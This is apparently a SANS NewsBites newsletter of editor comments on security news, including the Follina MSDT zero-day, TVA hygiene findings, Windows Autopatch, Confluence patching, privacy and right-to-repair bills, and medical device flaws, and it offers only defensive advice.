Active Follina Exploits and No Patch From Microsoft Drive Need for Immediate Action; TVA Has to Address Basic Security Hygiene and Governance of Federal Dam IT/OT Systems; Preview Windows Autopatch and Prioritize Implementation

This vulnerability should still be at the top of the list of things to worry about. You must implement the workaround to prevent exploitation. While anti-malware vendors are quickly updating signatures, they are inadequate to protect against the wide range of exploits that may take advantage of this vulnerability.

Johannes Ullrich

The Microsoft guidance includes a workaround of disabling the MSDT service on each endpoint. Many endpoint protection tools are also now able to detect and block the attack, check to see if you're covered there. Additionally verify your email security services are enabled, and are detecting and blocking this attack. While blocking externally sourced office documents is also an approach, use caution as this is likely impactful to the business and likely will be worked around by users.

Lee Neely

Just a reminder that SANS had a webinar on Follina you can view at https://www.sans.org/webcasts/emergency-webcast-msdt-ms-word-0-day/ and published a Follina Q&A with SANS instructor Jake Williams at https://www.sans.org/blog/follina-msdt-zero-day-q-a/

John Pescatore

One set of Follina exploits sighted is taking advantage of a digital signature that was created using a key stolen from software company Clickstudio. More sophisticated exploits like this will often bypass defenses.

Johannes Ullrich

Make sure your shields are up, IOCs in place and you've implemented your plan to mitigate the risks of a Follina attack.

Lee Neely

The deficiencies are mostly basic security hygiene issues – Implementation Group 1 of the Critical Security Controls. Most of IG1 are really related to shortcomings in IT (or in this case OT) operations and governance – updating applications and operating systems to current versions, having clear business ownership of systems, etc. The TVA has said it will remedy deficiencies by May 2023 but the OT operations and governance issues should be addressed ASAP.

John Pescatore

This is foundational cyber hygiene. Make sure that you have a comprehensive inventory of systems and that ownership, particularly of the security, is well defined. Then make sure that you are verifying the security posture, remediating gaps when discovered. Verify you have policies and procedures to support systems being deployed as securely as possible with open lines of communication on not only how to approach that, but also how to remediate discovered issues without throwing anyone under the bus.

Lee Neely

Per earlier NewsBites comments on Windows Autopatch, if you have the right licenses, try it out across a controlled test environment. The security gain is a given and application issues due to the patches are very likely to be less than you anticipate.

John Pescatore

Reducing the workload of keeping endpoints updated is a big win. This service is designed to work with enterprise devices, without necessitating a VPN connection. Note the prerequisites which include device management via Intune or Configuration Manager co-management, user accounts in Azure Active Directory or Hybrid Azure Active Directory Join. You may already meet these requirements for your enterprise systems.

Lee Neely

This should be enabled by default across all enterprises and systems. Fear of breaking applications is overstated. The risk of unpatched systems is a demonstrable problem.

William Hugh Murray

The flaw dates to Confluence Server and Data Center products version 1.3.0. The long-term fix, if you're continuing to host your Atlassian instance, is to update to the latest long term support release. If you're in a cluster, make sure that you don't forget to update all the nodes. Atlassian is pushing customers towards a hosted solution; after you apply the updates, this would be a good time to have those conversations, to include recording any show-stoppers to avoid re-hashing known issues.

Lee Neely

The US Congress has failed to pass federal data privacy laws many times over the past 15 years, so hard to be optimistic that this will actually pass, but some of the thornier issuers (like the preemption issue) have been addressed in this draft. The FTC has a good track record in this area – SANS gave the agency a Difference Makers award back in 2013. If the law passes, the FTC will have a year to establish the new office and define squishy terms such as “reasonably necessary, proportionate, and limited…” The draft also attempts to address social media algorithms, a controversial area.

John Pescatore

One hopes this time we get something enacted. Getting a common bar at the federal level should help raise the bar across the nation. One thing to keep an eye on is which state laws are preserved/not preempted. Generally, state laws to be preserved include consumer protection, civil rights, student and employee privacy, data breach notification, contract and tort, fraud, theft and identity theft, unauthorized access to electronic devices, and unauthorized use of personal information, cyber stalking, cyber bullying, sexual harassment, etc.

Lee Neely

This is a big step forward for local electronics repair shops in New York State, and offers hope for less expensive repair options, rather than wholesale replacement of damaged electronic devices. Once signed into law, there will be a year for implementation. Note the bill applies only to electronics; medical devices, home appliances, agricultural and off-road equipment, public safety communication equipment or motor vehicles are not subject to the bill.

Lee Neely

Note that for most enterprises, repairing mobile devices yourself will be significantly more expensive than even what Apple charges, but this may help drive repair prices down in the long run.

John Pescatore

Illumina has released a patch that protects against remote exploitation as a stopgap until the permanent fix can be released, BD is releasing Synapsis v4.20 SR2 later this month to address the weakness. BD Pyxis is working to remove hard coded credentials and is piloting a credential management solution as a long-term fix. In the interim, you're going to want to make sure the devices are properly segmented only allowing connections for authorized devices and users.

Lee Neely

Details are sparse, actions taken align with a ransomware versus DDoS attack. Some services are operating with fax rather than digital communication mechanisms. The city has engaged an IT service restoration company, SISPI, which is also helping to coordinate updates as well as service restoration.

Lee Neely